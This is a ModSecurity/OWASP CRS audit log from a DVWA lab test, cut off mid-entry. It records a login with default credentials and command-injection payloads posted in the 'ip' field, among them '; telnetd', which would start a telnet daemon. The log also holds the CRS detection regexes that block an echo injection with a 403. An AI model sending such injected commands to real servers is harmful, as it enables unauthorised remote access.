{"transaction":{"time":"13/May/2017:12:24:32 --0400","transaction_id":"WRczQH8AAQEAAAkYuEcAAAAD","remote_address":"192.168.75.145","remote_port":56756,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/login.php HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/login.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"88"},"body":["username=admin&password=password&Login=Login&user_token=1906be74335ec24718b92c5fbc145c6d"]},"response":{"protocol":"HTTP/1.1","status":302,"headers":{"Expires":"Thu, 19 Nov 1981 08:52:00 GMT","Cache-Control":"no-store, no-cache, must-revalidate, post-check=0, pre-check=0","Pragma":"no-cache","Location":"index.php","Content-Length":"0","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=UTF-8"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/login.php\"] [unique_id \"WRczQH8AAQEAAAkYuEcAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":728,"p2":3497,"p3":101,"p4":165,"p5":68,"sr":21,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:24:32 --0400","transaction_id":"WRczQH8AAQEAAAkYuEgAAAAD","remote_address":"192.168.75.145","remote_port":56756,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/index.php HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/login.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"2725","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/index.php\"] [unique_id \"WRczQH8AAQEAAAkYuEgAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":656,"p2":2384,"p3":157,"p4":898,"p5":80,"sr":45,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:24:35 --0400","transaction_id":"WRczQ38AAQEAAAkYuEkAAAAD","remote_address":"192.168.75.145","remote_port":56756,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/index.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1402","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczQ38AAQEAAAkYuEkAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":638,"p2":2256,"p3":149,"p4":495,"p5":105,"sr":28,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:24:35 --0400","transaction_id":"WRczQ38AAQEAAAkYuEoAAAAD","remote_address":"192.168.75.145","remote_port":56756,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/index.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1402","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczQ38AAQEAAAkYuEoAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":614,"p2":2154,"p3":215,"p4":432,"p5":96,"sr":39,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:24:54 --0400","transaction_id":"WRczVn8AAQEAAAkZ0BAAAAAE","remote_address":"192.168.75.145","remote_port":56758,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"28"},"body":["ip=%3B+telnetd&Submit=Submit"]},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1408","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczVn8AAQEAAAkZ0BAAAAAE\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":940,"p2":2340,"p3":158,"p4":734,"p5":106,"sr":27,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:24:59 --0400","transaction_id":"WRczW38AAQEAAAkVV4gAAAAA","remote_address":"192.168.75.145","remote_port":56760,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"31"},"body":["ip=%27%3B+telnetd&Submit=Submit"]},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1408","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczW38AAQEAAAkVV4gAAAAA\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":638,"p2":2285,"p3":224,"p4":383,"p5":76,"sr":69,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:25:11 --0400","transaction_id":"WRczZ38AAQEAAAmHBJMAAAAF","remote_address":"192.168.75.145","remote_port":56762,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"37"},"body":["ip=%3Becho+%22hellow%22&Submit=Submit"]},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/exec/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. Pattern match \"(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\\".*\\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\\"]*(?:l[\\\\\\\\'\\\"]* ...\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"81\"] [id \"932100\"] [rev \"4\"] [msg \"Remote Command Execution: Unix Command Injection\"] [data \"Matched Data: ;echo \\x22hellow found within ARGS:ip: ;echo \\x22hellow\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"8\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"]","Warning. Pattern match \"(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\\"\\\\s]*(?:[\\\\w'\\\"\\\\./]+/|[\\\\\\\\'\\\"\\\\^]*\\\\w[\\\\\\\\'\\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\\"/\\\\\\\\]*\\\\\\\\)?[\\\"\\\\^]*(?:m[\\\"\\\\^]*(?:y[\\\"\\\\^]*s[\\\"\\\\^]*q[\\\"\\\\^]*l(?:[\\\"\\\\^]*(?:d[\\\"\\\\^]*u[\\\"\\\\^]*m[\\\"\\\\^]*p(?:[\\\"\\\\^]*s[\\\"\\\\^ ...\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"185\"] [id \"932110\"] [rev \"4\"] [msg \"Remote Command Execution: Windows Command Injection\"] [data \"Matched Data: ;echo found within ARGS:ip: ;echo \\x22hellow\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-windows\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=0,HTTP=0,SESS=0): Remote Command Execution: Windows Command Injection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczZ38AAQEAAAmHBJMAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"(?:;|\\\\\\\\\\\\\\\\{|\\\\\\\\\\\\\\\\||\\\\\\\\\\\\\\\\|\\\\\\\\\\\\\\\\||&|&&|\\\\\\\\\\\\\\\\n|\\\\\\\\\\\\\\\\r|\\\\\\\\\\\\\\\\$\\\\\\\\\\\\\\\\(|\\\\\\\\\\\\\\\\$\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\(|`|\\\\\\\\\\\\\\\\${|<\\\\\\\\\\\\\\\\(|>\\\\\\\\\\\\\\\\(|\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\s*\\\\\\\\\\\\\\\\))\\\\\\\\\\\\\\\\s*(?:{|\\\\\\\\\\\\\\\\s*\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\s*|\\\\\\\\\\\\\\\\w+=(?:[^\\\\\\\\\\\\\\\\s]*|\\\\\\\\\\\\\\\\$.*|\\\\\\\\\\\\\\\\$.*|<.*|>.*|\\\\\\\\\\\\\\\\'.*\\\\\\\\\\\\\\\\'|\\\\\\\\\".*\\\\\\\\\")\\\\\\\\\\\\\\\\s+|!\\\\\\\\\\\\\\\\s*|\\\\\\\\\\\\\\\\$)*\\\\\\\\\\\\\\\\s*(?:'|\\\\\\\\\")*(?:[\\\\\\\\\\\\\\\\?\\\\\\\\\\\\\\\\*\\\\\\\\\\\\\\\\[\\\\\\\\\\\\\\\\]\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\)\\\\\\\\\\\\\\\\-\\\\\\\\\\\\\\\\|+\\\\\\\\\\\\\\\\w'\\\\\\\\\"\\\\\\\\\\\\\\\\./\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\]+/)?[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"]*(?:l[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"]* ...\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"81\"] [id \"932100\"] [rev \"4\"] [msg \"Remote Command Execution: Unix Command Injection\"] [data \"Matched Data: ;echo \\\\\\\\x22hellow found within ARGS:ip: ;echo \\\\\\\\x22hellow\\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"8\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczZ38AAQEAAAmHBJMAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match 